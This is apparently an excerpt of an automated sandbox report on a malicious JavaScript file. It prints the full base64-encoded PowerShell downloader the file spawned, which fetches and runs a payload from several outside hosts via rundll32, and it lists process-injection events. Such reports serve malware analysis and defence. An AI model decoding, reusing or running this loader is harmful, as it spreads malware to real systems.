AQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2584 resumed a thread in remote process 2860
Process injection	Process 2860 resumed a thread in remote process 2972
NtResumeThread May 25, 2023, 10:44 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2860	1	0	0
NtResumeThread May 25, 2023, 10:44 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2972	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

exosporeEloper.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All